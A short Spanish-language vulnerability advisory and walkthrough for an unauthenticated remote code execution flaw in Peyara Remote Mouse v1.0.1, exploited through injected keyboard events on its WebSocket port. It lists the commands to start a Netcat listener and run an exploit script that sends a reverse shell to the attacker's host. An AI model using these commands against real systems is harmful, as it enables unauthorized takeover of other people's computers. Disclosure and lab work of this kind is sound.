
Peyara Remote Mouse v1.0.1 - Ejecución Remota de Código (RCE)
Peyara Remote Mouse v1.0.1 contiene una vulnerabilidad de ejecución remota de código no autenticada en su interfaz de comandos WebSocket (puerto 1313). La aplicación no valida ni sanea los comandos simulados de entrada de teclado recibidos a través de conexiones WebSocket, lo que permite a los atacantes encadenar eventos de teclado maliciosos que ejecutan comandos arbitrarios del sistema. Esta vulnerabilidad puede explotarse de forma remota sin autenticación para lograr un compromiso total del sistema.
Instalar la aplicación vulnerable
Descargue e instale Peyara Remote Mouse en el sistema Windows objetivo.
Iniciar el listener de Netcat
Abra una terminal y ejecute:
nc -nlvp 4444
Ejecutar el script de explotación
python3 Peyara.py --target 192.168.1.107 --lhost 192.168.1.110 --lport 4444

